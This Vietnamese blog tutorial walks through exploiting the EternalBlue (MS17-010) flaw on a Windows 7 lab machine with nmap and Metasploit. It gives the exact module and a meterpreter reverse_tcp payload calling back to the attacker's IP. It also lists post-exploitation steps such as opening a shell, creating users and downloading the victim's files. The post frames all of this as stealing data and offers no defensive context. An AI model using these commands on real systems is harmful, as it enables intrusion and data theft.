Store and share experiences about robocon, IoT, Embedded...
  • Home
  • Linux
  • Window
    • Latex
    • Matlab
  • Embedded programming
    • Jetson Tx1
    • Raspberry Pi
    • Raspberry Pico
  • Internet of things
    • HTTP+MySQL cho IoT
    • Websocket+Nodejs
    • ESP32
  • Electronics and robots
    • Robocon
    • Arduino
    • RISCV
    • FPGA
  • Network and devices
    • Basic CCNA
  • IoT Server
  • Q&A (Hỏi đáp)
  • About
No Result
View All Result
  • Home
  • Linux
  • Window
    • Latex
    • Matlab
  • Embedded programming
    • Jetson Tx1
    • Raspberry Pi
    • Raspberry Pico
  • Internet of things
    • HTTP+MySQL cho IoT
    • Websocket+Nodejs
    • ESP32
  • Electronics and robots
    • Robocon
    • Arduino
    • RISCV
    • FPGA
  • Network and devices
    • Basic CCNA
  • IoT Server
  • Q&A (Hỏi đáp)
  • About
No Result
View All Result
Store and share experiences about robocon, IoT, Embedded...
No Result
View All Result
Home Linux

Khai thác EternalBlue trên Windows bằng Metasploit

Khai thác EternalBlue trên Windows bằng Metasploit

admin by admin
March 30, 2021
in Linux
0 0
0

Ta có thể đánh cắp dữ liệu của nạn nhân từ xa một cách dễ dàng khi máy tính nạn nhân có lỗ hổng bảo mật – EternalBlue trên Windows 

Mô hình:

  • Máy tính của kẻ tấn công sử dụng Kali có ip: 192.168.154.129
  • Máy tính của nạn nhân sử dụng Win 7có ip: 192.168.154.128

Bước 1. Ping đến máy nạn nhân. Dò quét cổng 445 xem máy nạn nhân có mở cổng 445 hay không.

Bước 2. Kiểm tra xem có khả năng khai thác nạn nhân trên cổng 445

a) Chuẩn bị scripts kiểm tra lỗ hổng: locate *nse

Kết quả

Nếu không có scripts có tên smb-vuln-ms17-010

  1. Download the nmap NSE script to scan for CVE-2017-0143. The file to download is https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse and you should save it in the scripts subfolder of the directory in which you installed nmap.
  2. Run the following command to update the NSE script rule database: nmap –script-updatedb

Link: https://www.vanstechelman.eu/content/scanning-for-cve-2017-0143-eternalblue-using-nmap-ms17-010

b) Chạy scripts kiểm tra khả năng khai thác tại cổng 445

– Chạy script

nmap.exe -Pn -p445 –open –max-hostgroup 3 –script smb-vuln-ms17-010 192.168.154.128

Kết quả khi cổng 445 có thể tấn công:

Kết quả cổng 445 nhưng ko thể tấn công qua cổng này:

Bước 4. Khi biết có thể tấn công qua cổng 445: Ta sử dụng công cụ tiếp theo là metasploit

a) Bật metasploit sau đó sử dụng lệnh search + tên lỗ hổng ms17-010

b) Thực thi: sử dụng lệnh use + số thứ tự

Ngoài ra có thể gõ trực tiếp use exploit/windows/smb/ms17_010_eternalblue

 

Bước 5. Thiết lập ip port trước khi tấn công

a) Kiểm tra các khai báo

b) Khai báo:

– Chỉ định địa chỉ IP của mục tiêu.

RHOST: Đây chính là địa chỉ IP của máy mục tiêu.

set rhosts 192.168.154.128

Kết quả:

– Tải shell Reverse_tcp đáng tin cậy làm tải trọng .

set payload windows/x64/meterpreter/reverse_tcp

– Khai báo IP và port của máy Attacker (chính là khai báo ip của máy mà ta đang sử dụng)

set lhost 192.168.154.129

set lport 4321 nếu cần; không set thì mặc định lport là 4444

c) Kiểm tra lại kết quả sau khi khai báo

Bước 6. Tấn công

– Sử dụng lệnh run

Kết quả cuối cùng có biểu tượng WIN là ta đã kết nối thành công đến máy mục tiêu

Kết nối thành công nếu kiểm tra trên máy nạn nhân sẽ thấy có 1 phiên liên lạc đã được thiết lập

Bước 7. Tiến hành khai thác nạn nhân

Sau khi kết nối có hiện WIN. Ta có thể sử dụng các lệnh để khai thác máy tính nạn nhân

– Kiểm tra HĐH : sysinfo

– Kiểm tra ổ C

– Kiểm tra hiện tại ta đang ở thư mục nào của nạn nhân: pwd

– Để vào thẳng cmd của máy nạn nhân sử dụng: shell

– Tại đây ta có thể sử dụng các lệnh cmd để khai thác máy tính của nạn nhân. Như copy, upload, tạo người dùng mới……

Ví dụ: Tải thư mục từ máy nạn nhân về

Chúc các bạn thành công

Số lượt xem: 506

Related Posts

Khắc phục lỗi khi cài song song Ubuntu và Window

Khắc phục lỗi khi cài song song Ubuntu và Window

October 22, 2019
2.8k
Phân quyền bảo vệ và truy xuất tệp tin

Phân quyền bảo vệ và truy xuất tệp tin

October 12, 2019
204

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Bài viết đọc nhiều

IoT Webserver- ESP8266/ESP32 gửi dữ liệu lên Cloud, hiển thị ra trình duyệt web với MySQL và PHP

IoT Webserver- ESP8266/ESP32 gửi dữ liệu lên Cloud, hiển thị ra trình duyệt web với MySQL và PHP

February 9, 2023
17.6k
Điều khiển ESP8266/ESP32 từ xa qua internet, không cần mở Port modem

Điều khiển ESP8266/ESP32 từ xa qua internet, không cần mở Port modem

November 7, 2019
10.7k
ESP32-CAMERA: Cài đặt môi trường Arduino IDE và nạp chương trình

ESP32-CAMERA: Cài đặt môi trường Arduino IDE và nạp chương trình

December 27, 2019
7.3k
IoT webserver- Gửi thông báo bằng email từ ESP8266 không dùng IFTTT

IoT webserver- Gửi thông báo bằng email từ ESP8266 không dùng IFTTT

November 19, 2020
5.7k
Store and share experiences about robocon, IoT, Embedded…

Lưu và chia sẻ những gì đã đọc, đã làm, đã nghiên cứu về vi điều khiển, hệ thống nhúng, internet of things, kiến trúc máy tính và hệ điều hành.

Liên hệ với quản trị viên

Chủ đề

  • Arduino
  • CCNA cơ bản
  • Cisco
  • Điện tử- Robot
  • ESP32
  • FPGA
  • HTTP+MySQL cho IoT
  • IoT Server
  • Jetson Tx1
  • Lập trình nhúng
  • Latex
  • Linux
  • Mạng và thiết bị mạng
  • Raspberry Pi
  • Raspberry Pico
  • RISCV
  • Robocon
  • Web of things
  • Websocket+Nodejs
  • Window
  • WordPress

Quản trị trang

  • Log in
  • Entries feed
  • Comments feed
  • WordPress.org

© 2019- 2023 luuvachiase.net - Phát triển và quản trị bởi Đỗ Ngọc Tuấn và Nguyễn Văn Tuấn ***Vui lòng ghi rõ nguồn khi trích dẫn bài viết từ Website này. DMCA.com Protection Status

No Result
View All Result
  • Trang chủ
  • Linux
  • Window
  • Lập trình nhúng
    • Jetson Tx1
    • Raspberry Pi
  • Web of things
    • HTTP+MySQL cho IoT
    • Websocket+Nodejs
  • Điện tử- Robot
    • Robocon
    • Arduino
    • RISCV
    • FPGA
  • Mạng và thiết bị mạng
    • CCNA cơ bản
  • IoT Server
  • Giới thiệu
  • Q&A (Hỏi đáp)

© 2019- 2023 luuvachiase.net - Phát triển và quản trị bởi Đỗ Ngọc Tuấn và Nguyễn Văn Tuấn ***Vui lòng ghi rõ nguồn khi trích dẫn bài viết từ Website này. DMCA.com Protection Status

Login to your account below

Forgotten Password?

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In